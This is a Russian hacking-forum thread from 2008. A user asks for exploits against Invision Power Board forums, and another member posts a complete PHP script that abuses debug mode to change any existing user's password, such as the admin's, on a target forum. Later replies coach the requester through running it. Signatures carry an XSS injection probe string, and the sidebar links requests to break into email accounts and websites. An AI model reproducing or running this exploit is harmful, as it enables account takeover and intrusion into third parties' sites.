CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Сплоит под ipb
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Сети / Общее RSS подписка на сообщения с форума Subscribe
Локальные сети и Интернет. Проблемы, решения. Взлом и защита

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Страницы сообщения: [1] [2] Просмотров - 20574
Сплоит под ipb
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
M.W.N.N.


Gold Member
# | Сообщение добавлено 16.06.2008 20:51:28
НАрод дайте пож-та сплоит для ipb 2.1.7 очень нужно.
И вабще если есть и не трудно скиньте сплоиты для ipb 1.* и ipb 2.*
 


 
javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">
Сказать спасибо Ответить Цитировать

MaDfUn


Gold Member
# | Сообщение добавлено 16.06.2008 23:00:59
Отредактировано 16.06.2008 23:04:46 by MaDfUn
Invision Power Board v2.1.7 (Debug) Remote Password Change Exploit
 


<?php
/*
 
Debug Mode password change vulnerability
Affects Invision Power Borard 2.0.0 to 2.1.7
by Rapigator
  
This works if:
 
"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on
  
In General Configuration of the forum software.
 
*/
 
// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";
 
// An existing user's login name
$name = "admin";
 
// The new password(3-32 characters)
$pass = "1234";
 
// You can use a proxy...
// $proxy = "1.2.3.4:8080";
 
 
 
// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class='green'>INSERT</span> INTO <span class='purple'>([\w]*?)_reg_antispam</span> \(regid,regcode,ip_address,ctime\) VALUES\('([\w]{32}?)',([\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "&debug=1";
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\w]*?)_reg_antispam \(regid,regcode,ip_address,ctime\) VALUES\('([\w]{32}?)',([\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode)) {
echo "Error: Probably not vulnerable, or no forum found";
exit;
}
 
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class='green'>INSERT</span> INTO <span class='purple'>'.$prefix.'_validating</span> \(vid,member_id,real_group,temp_group,entry_date,  coppa_user,lost_pass,ip_address\) VALUES\('([\w]{32}?)',([\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \(vid,member_id,real_group,temp_group,entry_date,  coppa_user,lost_pass,ip_address\) VALUES\('([\w]{32}?)',([\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
 
function change_pass($regcode,$regid,$vid,$userid) {
global $site, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
взято от сюда
http://forum.antichat.ru/thread15678.html
Сказать спасибо Ответить Цитировать

MaDfUn


Gold Member
# | Сообщение добавлено 16.06.2008 23:04:21
http://forum.antichat.ru/threadnav25088-1-10.html
http://forum.antichat.ru/threadnav23405-1-10.html
http://forum.antichat.ru/thread15678.html
смотри милворм, секьюритилаб багтрек и тд
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 16.06.2008 23:29:03
А на perle нету? А то я не оч щарю с перлом более мение разобрался. или можеш подсказать как этот компилировать.
 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать

MaDfUn


Gold Member
# | Сообщение добавлено 16.06.2008 23:40:29
Нет на пёрле нету...пхп не надо компилить, поставь себе пхп на тачку, скрипт сохрани в какойто файл с расширением php. Дальше просто пишеш в консоли путь к php/php.exe пробел путь к скрипту/имя скрипта.php
зы
дальше разберёшся, а как юзать xss спроси гугл или яшу или просто зайди в раздел статьи на ачате...
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 17.06.2008 03:33:32
Помоги пож-та разобраться.
Я зделал как ты сказал нашел php-5.2.1.
Поместил его на C:\
В cmd пишу C:\php\php.exe c:\"имя фаила".php
Запускает и пишет по англиски что в 22 строке ошибка.
Открываю фаил со сплоитом ищу...
 
*/
 
// The forum's address up to and including 'index.php'
$site = "СЮДА НУЖНО ВПИСАТЬ САЙТ ДОПУСТИМ www.xxx.ru"
 
// An existing user's login
$name = "ПРОХОЖУ РЕГИСТРАЦИЮ НА ФОРУМЕ И ВПИСЫВАЮ СЮДА ЛОГИН ДОПУСТИМ QQQ"*.
 

// The new password(3-32 characters)
$pass = "СЮДА ПАРОЛЬ ОТ ЛОГИНА ДОПУСТИ 123";
 
// You can use a proxy...
// $proxy = "СЮДА ЛЮБОЙ ПРОКСИ СЕРВЕР???";
 
Не могу понять где моя ошибка. Трудновато когда язык не знаеш...
 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать

MaDfUn


Gold Member
# | Сообщение добавлено 17.06.2008 09:14:06
позаполняй поля, там вроде написано что и куда писать...
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 17.06.2008 13:53:25
Отредактировано 17.06.2008 13:53:45 by M.W.N.N.
// -----------------------------
$site = "";  ------------------ЗДесь повторить тот-же сайт который я выше писал.
$suffix = ""; ----------------- А что это поле озночает?
 
У меня кокрас в этих полях ошибки.
 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать

MaDfUn


Gold Member
# | Сообщение добавлено 17.06.2008 14:42:04
Заполняй только шапку

// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";
 
// An existing user's login name
$name = "admin";
 
// The new password(3-32 characters)
$pass = "1234";
 
// You can use a proxy...
// $proxy = "1.2.3.4:8080";
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 17.06.2008 15:42:41
мммм.  Чето не то. Я заполнил все, пытаюсь запустить. Пишет ошибка в 43 строке. (
 

 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать

Страницы сообщения: [1] [2]
Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Опубликован бесплатный дешифратор для вымогателя BlackByte
  • Zerodium покупает уязвимости в ExpressVPN, NordVPN и Surfshark
  • За взломом сайтов REvil стояли правоохранительные органы
  • Уязвимость ProxyToken позволяет воровать почту через Microsoft Ex...
  • T-Mobile взломали через уязвимый роутер
  • Ботнет Phorpiex прекратил работу, его исходный код выставлен на п...
  • Критическая уязвимость в Cosmos DB
  • Исследователи научились обходить PIN-коды для карт Mastercard и M...
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Программы » Re: Hasp ключ для ABC-4
  • Портал / Отзывы и предложения » Предлагаем партнерство вашему форуму.
  • Разное / Предложения работы » взлом почты
  • Разное / Предложения работы » Сервис Postman - 500 руб за получение писем и 10€ за пересыл...
  • Разное / Куплю, приму в дар » Покупка аккаунтов Uphold
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Взлом и безопасность / Новичкам » Re: Помогите взломать gmail.com

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}